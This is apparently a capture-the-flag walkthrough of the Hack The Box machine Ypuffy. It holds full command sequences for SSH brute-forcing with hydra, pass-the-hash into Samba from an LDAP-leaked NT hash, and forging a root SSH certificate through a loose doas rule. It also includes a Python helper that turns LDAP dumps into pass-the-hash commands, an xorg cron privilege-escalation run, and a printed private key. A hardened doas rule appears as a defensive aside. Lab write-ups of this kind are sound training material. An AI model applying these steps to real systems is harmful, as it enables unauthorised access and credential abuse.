Ypuffy
# Getting started
Normally I start off with an nmap portscan and enumerate my way up from there.
But because I'm doing OSCP, I have written a program that does the enumeration for me and gives recommendations based on its findings.
Not because I'm lazy, but because it normally saves me time.
```
[ASCII art banner]
Created by n0w4n

[-] Do you want to save the reports? (y/n) y
[-] Give path for saving the reports (example: /root/rtk/reports/): /root/htb/ypuffy
[-] What is the IP address of the target? 10.10.10.107
[*] Starting a fast TCP portscan on target
[*] Parsing output into a tmp file for further analysis
[*] Starting a TCP full scan on the target with acquired ports
[*] This can take some time
[*] Starting a fast UDP portscan on target
[*] Parsing output into a tmp file for further analysis
[*] There are no open UDP ports......skipping
[*] Creating report
#############################################################################################
[*] Found the following open ports and services on the target:
22    tcp    OpenSSH 7.7 (protocol 2.0)
80    tcp    OpenBSD httpd
139   tcp    Samba smbd 3.X - 4.X (workgroup: YPUFFY)
389   tcp    (Anonymous bind OK)
445   tcp    Samba smbd 4.7.6 (workgroup: YPUFFY)
#############################################################################################
[*] The following recommendations can be made:

[*] DOMAIN
Found domain = hackthebox.htb
Found fqdn = ypuffy.hackthebox.htb
Use command to add to hosts:
1.) echo 10.10.10.107 hackthebox.htb >> /etc/hosts

[*] SMB
No open shares found!

[*] SSH
Try bruteforcing with the commands:
1.) hydra -l root -P /usr/share/wordlists/rockyou.txt 10.10.10.107 -t 4 ssh
2.) hydra -L /usr/share/wordlists/seclists/Usernames/Names/names.txt -P /usr/share/wordlists/rockyou.txt 10.10.10.107 -t 4 ssh
    (If nothing else works - try this as a last resort)

[*] WEB
To enumerate the directories run the command:
1.) python3 <path to dirsearch>/dirsearch.py -u 10.10.10.107 -e php,html,htm,cgi,asp,aspx,pdf,txt -x 400,403,404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

back to (m)ain menu or (e)xit this program?
```
This small bash script is a framework that drives a lot of pentesting tools in a semi-automated way.
If you really want to learn what you're doing, you may want to do all of this manually. But if you know your way around Kali, this tool can save some time.
After I'm done with OSCP this tool will be posted on GitHub for anyone interested.
Some useful information about OpenBSD LDAP security: http://puffysecurity.com/wiki/ypldap.html
When I try to connect to the webserver from a browser I get a 400 Bad Request error and the connection is reset.
But with nc I get a different view:

```
root@kali:~/htb/ypuffy# nc -nv 10.10.10.107 80
(UNKNOWN) [10.10.10.107] 80 (http) open

HTTP/1.0 400 Bad Request
Date: Thu, 03 Jan 2019 11:26:59 GMT
Server: OpenBSD httpd
Connection: close
Content-Type: text/html
Content-Length: 431

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>400 Bad Request</title>
<style type="text/css"><!--
body { background-color: white; color: black; font-family: 'Comic Sans MS', 'Chalkboard SE', 'Comic Neue', sans-serif; }
hr { border: 0; border-bottom: 1px dashed; }
--></style>
</head>
<body>
<h1>400 Bad Request</h1>
<hr>
<address>OpenBSD httpd</address>
</body>
</html>
```

The use of the HTML address tag is a bit odd. Because the LDAP service on port 389 accepts anonymous binds, I try to connect to it with JXplorer.
```
cn               Alice
displayName      Alice
gecos            Alice
gidNumber        5000
homeDirectory    /home/alice1978
loginShell       /bin/ksh
sambaNTPassword  0B186E661BBDBDCF6047784DE8B9FD8B
sambaSID         S-1-5-21-3933741069-3307154301-3557023464-1001
uid              alice1978
uidNumber        5000
userPassword     {BSDAUTH}alice1978
```

We got some info about user Alice.

```
cn               Bob
gecos            Bob
gidNumber        5001
homeDirectory    /home/bob8791
loginShell       /bin/ksh
uid              bob8791
uidNumber        5001
userPassword     {BSDAUTH}bob8791
```

And there is some info about user Bob.
The most useful piece of information here is Alice's sambaNTPassword attribute. The userPassword values are only {BSDAUTH} markers, not hashes, so there is nothing to crack there, but sambaNTPassword is the NT hash Samba checks NTLM logins against.
That means it can be replayed as-is (pass-the-hash) to authenticate to the Samba server without ever knowing the password.
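An added example (not code from the writeup) of what I would do with an anonymous LDAP dump in a less hand-driven way: parse the LDIF that ldapsearch prints (JXplorer shows the same attributes as a tree), keep only entries carrying a well-formed sambaNTPassword, and emit the pass-the-hash command lines. The LDIF is constructed from the attribute values above; the DNs and objectClass values are assumptions.

```python
"""Pull pass-the-hash material out of an anonymous LDAP dump.

Added example, not code from the original writeup. It parses LDIF text and
picks out every entry carrying a sambaNTPassword, the NT hash Samba checks
NTLM authentication against, which can therefore be replayed as-is.
"""
import base64
import re

# Constructed sample; DN and objectClass values are assumed, the attributes
# are the ones JXplorer showed on the box.
SAMPLE_LDIF = """\
dn: uid=alice1978,ou=passwd,dc=hackthebox,dc=htb
objectClass: posixAccount
objectClass: sambaSamAccount
cn: Alice
uid: alice1978
uidNumber: 5000
gidNumber: 5000
homeDirectory: /home/alice1978
loginShell: /bin/ksh
sambaNTPassword: 0B186E661BBDBDCF6047784DE8B9FD8B
sambaSID: S-1-5-21-3933741069-3307154301-3557023464-1001
userPassword: {BSDAUTH}alice1978

dn: uid=bob8791,ou=passwd,dc=hackthebox,dc=htb
objectClass: posixAccount
cn: Bob
uid: bob8791
uidNumber: 5001
gidNumber: 5001
homeDirectory: /home/bob8791
loginShell: /bin/ksh
userPassword: {BSDAUTH}bob8791
"""

NT_HASH_RE = re.compile(r"^[0-9A-Fa-f]{32}$")


def unfold(text):
    """Join LDIF continuation lines (a leading space continues the previous line)."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def parse_ldif(text):
    """Return a list of entries, each a dict attribute -> list of values.

    Entries are separated by blank lines; '::' marks a base64-encoded value,
    which ldapsearch uses for anything that is not plain printable ASCII.
    """
    entries, current = [], {}
    for line in unfold(text) + [""]:
        if line == "":
            if current:
                entries.append(current)
            current = {}
            continue
        if line.startswith("#") or line.startswith("version:"):
            continue
        if ":: " in line:
            attr, value = line.split(":: ", 1)
            value = base64.b64decode(value).decode("utf-8", "replace")
        else:
            attr, value = line.split(": ", 1)
        current.setdefault(attr, []).append(value)
    return entries


def pth_candidates(entries):
    """Accounts whose sambaNTPassword is a well-formed 32-hex NT hash.

    userPassword values like '{BSDAUTH}alice1978' are ignored: they are
    markers for BSD authentication, not hashes, so there is nothing to crack.
    """
    found = []
    for entry in entries:
        for value in entry.get("sambaNTPassword", []):
            if NT_HASH_RE.match(value):
                found.append({
                    "uid": entry.get("uid", ["?"])[0],
                    "nthash": value.upper(),
                    "sid": entry.get("sambaSID", [None])[0],
                })
    return found


def pth_commands(cand, host, domain):
    """Command lines to check and use the hash; the LM half is left empty."""
    return [
        # newer crackmapexec releases want the protocol ('smb') as first argument
        f"crackmapexec smb {host} -u {cand['uid']} -H {cand['nthash']}",
        f"smbclient.py -hashes :{cand['nthash']} {domain}/{cand['uid']}@{host}",
    ]


if __name__ == "__main__":
    for cand in pth_candidates(parse_ldif(SAMPLE_LDIF)):
        print(f"{cand['uid']} {cand['sid']}")
        for cmd in pth_commands(cand, "10.10.10.107", "YPUFFY"):
            print("   ", cmd)
```

Feed it the output of `ldapsearch -x -H ldap://10.10.10.107 -b dc=hackthebox,dc=htb` instead of the constructed sample to get the same result from the live service. Bob drops out because his entry has no NT hash at all, which is exactly why only Alice's account is usable against SMB.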
To test this there is a nice tool called crackmapexec. It can sweep a whole network and check whether a set of credentials (or a bare NT hash) is accepted on several machines.
In this case it is just one machine.

```
root@kali:~# crackmapexec 10.10.10.107 -u alice1978 -H 0B186E661BBDBDCF6047784DE8B9FD8B
CME          10.10.10.107:445 YPUFFY          [*] Windows 6.1 Build 0 (name:YPUFFY) (domain:YPUFFY)
CME          10.10.10.107:445 YPUFFY          [+] YPUFFY\alice1978 0B186E661BBDBDCF6047784DE8B9FD8B
[*] KTHXBYE!
```
It looks like it works. To connect I can use smbclient.py, found in the impacket collection.

```
root@kali:~/opt/tools/impacket/build/scripts-2.7# ./smbclient.py -hashes :0B186E661BBDBDCF6047784DE8B9FD8B YPUFFY/alice1978@10.10.10.107
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation

Type help for list of commands
# shares
alice
IPC$
# use alice
# ls
drw-rw-rw-          0  Tue Jul 31 04:54:20 2018 .
drw-rw-rw-          0  Wed Aug  1 05:16:50 2018 ..
-rw-rw-rw-       1460  Tue Jul 17 03:38:51 2018 my_private_key.ppk
# get my_private_key.ppk
```

```
root@kali:~/htb/ypuffy# cat my_private_key.ppk
PuTTY-User-Key-File-2: ssh-rsa
Encryption: none
Comment: rsa-key-20180716
Public-Lines: 6
AAAAB3NzaC1yc2EAAAABJQAAAQEApV4X7z0KBv3TwDxpvcNsdQn4qmbXYPDtxcGz
1am2V3wNRkKR+gRb3FIPp+J4rCOS/S5skFPrGJLLFLeExz7Afvg6m2dOrSn02qux
BoLMq0VSFK5A0Ep5Hm8WZxy5wteK3RDx0HKO/aCvsaYPJa2zvxdtp1JGPbN5zBAj
h7U8op4/lIskHqr7DHtYeFpjZOM9duqlVxV7XchzW9XZe/7xTRrbthCvNcSC/Sxa
iA2jBW6n3dMsqpB8kq+b7RVnVXGbBK5p4n44JD2yJZgeDk+1JClS7ZUlbI5+6KWx
ivAMf2AqY5e1adjpOfo6TwmB0Cyx0rIYMvsog3HnqyHcVR/Ufw==
Private-Lines: 14
AAABAH0knH2xprkuycHoh18sGrlvVGVG6C2vZ9PsiBdP/5wmhpYI3Svnn3ZL8CwF
VGaXdidhZunC9xmD1/QAgCgTz/Fh5yl+nGdeBWc10hLD2SeqFJoHU6SLYpOSViSE
cOZ5mYSy4IIRgPdJKwL6NPnrO+qORSSs9uKVqEdmKLm5lat9dRJVtFlG2tZ7tsma
hRM//9du5MKWWemJlW9PmRGY6shATM3Ow8LojNgnpoHNigB6b/kdDozx6RIf8b1q
Gs+gaU1W5FVehiV6dO2OjHUoUtBME01owBLvwjdV/1Sea/kcZa72TYIMoN1MUEFC
3hlBVcWbiy+O27JzmDzhYen0Jq0AAACBANTBwU1DttMKKphHAN23+tvIAh3rlNG6
m+xeStOxEusrbNL89aEU03FWXIocoQlPiQBr3s8OkgMk1QVYABlH30Y2ZsPL/hp6
l4UVEuHUqnTfEOowVTcVNlwpNM8YLhgn+JIeGpJZqus5JK/pBhK0JclenIpH5M2v
4L9aKFwiMZxfAAAAgQDG+o9xrh+rZuQg8BZ6ZcGGdszZITn797a4YU+NzxjP4jR+
qSVCTRky9uSP0i9H7B9KVnuu9AfzKDBgSH/zxFnJqBTTykM1imjt+y1wVa/3aLPh
hKxePlIrP3YaMKd38ss2ebeqWy+XJYwgWOsSw8wAQT7fIxmT8OYfJRjRGTS74QAA
AIEAiOHSABguzA8sMxaHMvWu16F0RKXLOy+S3ZbMrQZr+nDyzHYPaLDRtNE2iI5c
QLr38t6CRO6zEZ+08Zh5rbqLJ1n8i/q0Pv+nYoYlocxw3qodwUlUYcr1/sE+Wuvl
xTwgKNIb9U6L6OdSr5FGkFBCFldtZ/WSHtbHxBabb0zpdts=
Private-MAC: 208b4e256cd56d59f70e3594f4e2c3ca91a757c9
```
# Remote access
This is a .ppk file, the private key format of the Windows program PuTTY. It is stored unencrypted (Encryption: none), so no passphrase is needed. To convert it to OpenSSH format I use puttygen.

```
root@kali:~/htb/ypuffy# puttygen my_private_key.ppk -O private-openssh -o private.key
root@kali:~/htb/ypuffy# chmod 600 private.key
root@kali:~/htb/ypuffy# ssh -i private.key alice1978@10.10.10.107
OpenBSD 6.3 (GENERIC) #100: Sat Mar 24 14:17:45 MDT 2018

Welcome to OpenBSD: The proactively secure Unix-like operating system.

Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code.  With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.

ypuffy$ id
uid=5000(alice1978) gid=5000(alice1978) groups=5000(alice1978)
```

```
ypuffy$ ls
user.txt windir
ypuffy$ cat user.txt
acbc06eb2982b14c2756b6c6e3767aab
```
First flag. On to root.
```
ypuffy$ awk -F : '$3 >= 1000 {print $0}' /etc/passwd
nobody:*:32767:32767:Unprivileged user:/nonexistent:/sbin/nologin
appsrv:*:1000:1000:Application Server:/var/appsrv:/sbin/nologin
userca:*:1001:1001:User CA:/home/userca:/bin/ksh
```

My current user alice1978 does not appear in /etc/passwd at all (the account comes from LDAP through ypldap), and apart from root the only local account with a login shell is userca.
```
ypuffy$ cat /etc/doas.conf
permit keepenv :wheel
permit nopass alice1978 as userca cmd /usr/bin/ssh-keygen
```

On OpenBSD, doas fills the role sudo has elsewhere: it lets you run commands as another user, according to the rules in /etc/doas.conf.
In this case alice1978 may run /usr/bin/ssh-keygen as userca without a password and with no restriction on its arguments. That should make it possible to generate new SSH keys and, more importantly, to sign them with whatever key userca holds.
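For comparison, here is the rule as found on the box beside a tighter variant. This is an added illustration, not configuration from the box; the `args` keyword of doas.conf(5) makes the rule match only when the user supplies exactly those arguments, and the fingerprint listing is an assumed legitimate use.

```conf
# As found: any ssh-keygen invocation is allowed, including "-s /home/userca/ca",
# which turns alice1978 into the SSH user CA.
permit nopass alice1978 as userca cmd /usr/bin/ssh-keygen

# Tighter: the argument list must match exactly, so only a fingerprint of the
# CA public key can be printed; "-s ..." no longer matches and is refused.
permit nopass alice1978 as userca cmd /usr/bin/ssh-keygen args -l -f /home/userca/ca.pub
```

The general lesson is that a doas or sudo rule for a binary that can read or sign with a secret (ssh-keygen, openssl, gpg) is only as safe as the argument restriction placed on it.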
Because SSH seems to play an important role in this scenario I took a look at the SSH server config file, /etc/ssh/sshd_config:

```
...SNIP...
# The default is to check both .ssh/authorized_keys and .ssh/authorized_keys2
# but this is overridden so installations will only check .ssh/authorized_keys
AuthorizedKeysFile      .ssh/authorized_keys

#AuthorizedPrincipalsFile none

AuthorizedKeysCommand /usr/local/bin/curl http://127.0.0.1/sshauth?type=keys&username=%u
AuthorizedKeysCommandUser nobody
TrustedUserCAKeys /home/userca/ca.pub
AuthorizedPrincipalsCommand /usr/local/bin/curl http://127.0.0.1/sshauth?type=principals&username=%u
AuthorizedPrincipalsCommandUser nobody
...SNIP...
```

Both AuthorizedKeysCommand and AuthorizedPrincipalsCommand run curl against a local web service, passing the login name being authenticated as %u. The first returns the public keys accepted for that user, the second the certificate principals accepted for that user. Together with TrustedUserCAKeys this means that any certificate signed by the private half of /home/userca/ca.pub, carrying a principal from that list, is enough to log in as that user.
There is a webserver running, but it was not accessible from the outside. What is in the config file?

```
ypuffy$ cat /etc/httpd.conf
server "ypuffy.hackthebox.htb" {
        listen on * port 80
        location "/userca*" {
                root "/userca"
                root strip 1
                directory auto index
        }
        location "/sshauth*" {
                fastcgi socket "/run/wsgi/sshauthd.socket"
        }
        location * {
                block drop
        }
}
```
Let's see what running the curl command retrieves.

```
ypuffy$ curl http://127.0.0.1/sshauth?type=principals&username=root
[1] 40045
ypuffy$ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>400 Bad Request</title>
<h1>Bad Request</h1>
<p>The browser (or proxy) sent a request that this server could not understand.</p>
[1] + Done                 curl http://127.0.0.1/sshauth?type=principals
```

Hmmmm.....that doesn't look right.

```
ypuffy$ curl "http://127.0.0.1/sshauth?type=principals&username=root"
3m3rgencyB4ckd00r
```

Much better. Unquoted, the `&` in the URL is taken by the shell as "run curl in the background", and `username=root` becomes a separate (harmless) variable assignment, so the server only ever saw `type=principals` and rejected the request. Quote the whole URL and curl gets both parameters.
Normally I would take this for a root password or something similar.
But a login attempt as root with it did not work. After reading the sshd_config documentation on AuthorizedPrincipalsCommand it is clear this is a principal name: the name a certificate has to carry to be accepted for the root login.
I have used SSH a lot, but mostly as a user of a setup that was already fully configured.
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/deployment_guide/sec-creating_ssh_ca_certificate_signing-keys has some interesting information about creating SSH keys and certificates, and is a good read on how to set up an SSH CA structure and the chain of trust that goes with it.
According to the sshd config the trusted user CA public key is /home/userca/ca.pub, so the matching private key should be /home/userca/ca, which is exactly what doas lets me use through ssh-keygen.
I'm going to create a key pair on my Kali host, transfer the public key to the remote host and sign it there with the private key of userca.
Hopefully this will grant me access as root.
```
root@kali:~/htb/ypuffy/ssh# ssh-keygen -t rsa -f ./id_rsa
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in ./id_rsa.
Your public key has been saved in ./id_rsa.pub.
The key fingerprint is:
SHA256:DB3UuFQzQf8z67vOXGwnkRPgZ8jf2JmSul3Ho7gKYQk root@kali
The key's randomart image is:
+---[RSA 2048]----+
|       .o=*..    |
|      .o..* o    |
|     E.... = +   |
|      .oo =.*o|
|        +S  oXoo|
|       . . . .O  |
|        . .  ooB|
|         . ++o++|
|          ..+.+Bo |
+----[SHA256]-----+
```

Now to copy the files to the remote host.

```
root@kali:~/htb/ypuffy/ssh# scp -i ../private.key id* alice1978@10.10.10.107:/tmp/n0w4n/
id_rsa                                        100% 1811    70.3KB/s   00:00
id_rsa.pub
```
And finally signing my public key with the private key found in /home/userca/ca.
It is important to use the principal name found earlier (-n) in the signing command; the -I value is just a free-form key identifier that ends up in the server log.

```
ypuffy$ doas -u userca /usr/bin/ssh-keygen -s /home/userca/ca -I n0w4n -n 3m3rgencyB4ckd00r /tmp/id_rs>
Signed user key /tmp/id_rsa-cert.pub: id "n0w4n" serial 0 for 3m3rgencyB4ckd00r valid forever
```

It looks like the signing is successful: a user certificate with a single principal, 3m3rgencyB4ckd00r, and no expiry.
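To make the certificate side of this concrete, here is an added example (not code from the writeup, and not OpenSSH's own code) that builds a certificate blob in the ssh-rsa-cert-v01@openssh.com wire format, decodes it again, and replays the decision sshd makes when TrustedUserCAKeys and AuthorizedPrincipalsCommand are both set: after the CA signature verifies, the certificate is good for a login name only if one of its principals appears in what the command printed for that user. The RSA values and the signature bytes are placeholders (the point is principal matching, not the crypto), the principal name and key id are the ones used on the box, and the per-user responses of /sshauth are constructed: root's is what curl returned, alice's is assumed empty.

```python
"""Decode an OpenSSH user certificate and replay sshd's principal check.

Added example, not code from the writeup or from OpenSSH. Key material and
the signature are dummies; only the authorisation fields are meaningful.
"""
import base64
import struct

CERT_TYPE = b"ssh-rsa-cert-v01@openssh.com"
USER_CERT = 1                  # 2 would be a host certificate
FOREVER = 0xFFFFFFFFFFFFFFFF   # what ssh-keygen stores for "valid forever"

# Constructed stand-in for AuthorizedPrincipalsCommand output, keyed by the
# %u login name. root's line is what curl returned; alice's is assumed empty.
PRINCIPALS_BY_USER = {
    "root": "3m3rgencyB4ckd00r\n",
    "alice1978": "",
}


def ssh_string(b):
    return struct.pack(">I", len(b)) + b


def ssh_mpint(n):
    # one spare leading byte keeps the two's complement value positive
    return ssh_string(n.to_bytes((n.bit_length() + 8) // 8, "big"))


def build_cert(principals, key_id, serial=0, valid_after=0, valid_before=FOREVER):
    """Assemble a user certificate; the user key, CA key and signature are dummies."""
    body = (
        ssh_string(CERT_TYPE)
        + ssh_string(b"\x00" * 32)                       # nonce
        + ssh_mpint(65537) + ssh_mpint(0xC0FFEE)         # user's RSA e, n (dummy)
        + struct.pack(">Q", serial)
        + struct.pack(">I", USER_CERT)
        + ssh_string(key_id.encode())
        + ssh_string(b"".join(ssh_string(p.encode()) for p in principals))
        + struct.pack(">Q", valid_after)
        + struct.pack(">Q", valid_before)
        + ssh_string(b"")                                # critical options
        + ssh_string(b"")                                # extensions
        + ssh_string(b"")                                # reserved
        + ssh_string(ssh_string(b"ssh-rsa") + ssh_mpint(65537) + ssh_mpint(0xCA))  # CA key (dummy)
    )
    return body + ssh_string(b"\x00" * 256)              # signature placeholder


class Reader:
    def __init__(self, data):
        self.data, self.pos = data, 0

    def string(self):
        (n,) = struct.unpack_from(">I", self.data, self.pos)
        value = self.data[self.pos + 4:self.pos + 4 + n]
        self.pos += 4 + n
        return value

    def uint(self, fmt):
        (v,) = struct.unpack_from(fmt, self.data, self.pos)
        self.pos += struct.calcsize(fmt)
        return v


def decode_cert(blob):
    """Read the fields sshd consults for authorisation after the signature check."""
    r = Reader(blob)
    if r.string() != CERT_TYPE:
        raise ValueError("not an ssh-rsa-cert-v01@openssh.com blob")
    for _ in range(3):                                   # nonce, e, n
        r.string()
    serial, ctype = r.uint(">Q"), r.uint(">I")
    key_id = r.string().decode()
    inner, principals = Reader(r.string()), []
    while inner.pos < len(inner.data):
        principals.append(inner.string().decode())
    valid_after, valid_before = r.uint(">Q"), r.uint(">Q")
    return {"serial": serial, "type": ctype, "key_id": key_id,
            "principals": principals,
            "valid_after": valid_after, "valid_before": valid_before}


def to_pubkey_line(blob, comment="n0w4n-cert"):
    """The one-line form ssh-keygen writes to id_rsa-cert.pub."""
    return f"{CERT_TYPE.decode()} {base64.b64encode(blob).decode()} {comment}"


def sshd_accepts(cert, login_name, now):
    """User cert, inside its validity window, and at least one principal that
    AuthorizedPrincipalsCommand listed for this login name. Without that
    directive sshd would instead require a principal equal to the login name."""
    if cert["type"] != USER_CERT:
        return False
    if not (cert["valid_after"] <= now < cert["valid_before"]):
        return False
    output = PRINCIPALS_BY_USER.get(login_name, "")
    allowed = {ln.strip() for ln in output.splitlines()
               if ln.strip() and not ln.startswith("#")}
    return any(p in allowed for p in cert["principals"])


if __name__ == "__main__":
    cert = decode_cert(build_cert(["3m3rgencyB4ckd00r"], "n0w4n"))
    print(cert)
    print("root login:", sshd_accepts(cert, "root", now=1546516000))
```

This is why a certificate with principal `root` would have been useless here while one carrying 3m3rgencyB4ckd00r works: the decision is driven entirely by what the sshauth backend returns for the login name, and the CA key alice1978 can use through doas signs any principal she asks for.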
Let's see if it worked. ssh picks up id_rsa-cert.pub automatically when it sits next to the id_rsa given with -i, so nothing else needs to be passed.

```
ypuffy$ ssh -i id_rsa -l root 127.0.0.1
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:oYYpshmLOvkyebJUObgH6bxJkOGRu7xsw3r7ta0LCzE.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts.
OpenBSD 6.3 (GENERIC) #100: Sat Mar 24 14:17:45 MDT 2018

Welcome to OpenBSD: The proactively secure Unix-like operating system.

Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code.  With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.

ypuffy# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
```

And finally for the flag.

```
ypuffy# cat /root/root.txt
1265f8e0a1984edd9dc1b6c3fcd1757f
```
# Alternate exploit
If you don't want all the hassle with SSH, keys and signing, there is an alternate way of rooting this box.
There is a fairly new xorg-x11-server local privilege escalation, which on OpenBSD can be exploited by abusing the X server's log-file option to overwrite /etc/crontab and let cron run a payload as root.
The exploit can be found here: https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm

```
ypuffy$ vi exploit.sh
...[PASTING THE SCRIPT]...
ypuffy$ chmod +x exploit.sh
ypuffy$ ./exploit.sh
./opt.sh[10]: ptor_xorgasm: not found

raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron
Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>

X.Org X Server 1.19.6
Release Date: 2017-12-20
X Protocol Version 11, Revision 0
Build Operating System: OpenBSD 6.3 amd64
Current Operating System: OpenBSD ypuffy.hackthebox.htb 6.3 GENERIC#100 amd64
Build Date: 24 March 2018  02:38:24PM
Current version of pixman: 0.34.0
        Before reporting problems, check http://wiki.x.org
        to make sure that you have the latest version.
Markers: (--) probed, (**) from config file, (==) default setting,
        (++) from command line, (!!) notice, (II) informational,
        (WW) warning, (EE) error, (NI) not implemented, (??) unknown.
(++) Log file: "crontab", Time: Thu Jan  3 16:21:01 2019
(==) Using system config directory "/usr/X11R6/share/X11/xorg.conf.d"
(EE)
(EE) Segmentation fault at address 0x8
(EE)
Fatal server error:
(EE) Caught signal 11 (Segmentation fault). Server aborting
(EE)
(EE)
Please consult the The X.Org Foundation support
         at http://wiki.x.org
 for help.
(EE) Please also check the log file at "crontab" for additional information.
(EE)
(EE) Server terminated with error (1). Closing log file.

Be patient for a couple of minutes...

Don't forget to cleanup and run crontab -e to reload the crontab.

-rw-r--r--  1 root  wheel  4814 Jan  3 16:21 /etc/crontab
-rwsrwxrwx  1 root  wheel  7257 Jan  3 16:23 /usr/local/bin/pwned
ypuffy# id
uid=0(root) gid=0(wheel) groups=5000(alice1978)
```
And the final step....

```
ypuffy# cat root.txt
1265f8e0a1984edd9dc1b6c3fcd1757f
```

Not really the way you want to do this box: it is more of a script kiddie route that doesn't teach you a thing, and it leaves a world-writable setuid binary and a modified /etc/crontab behind that need cleaning up.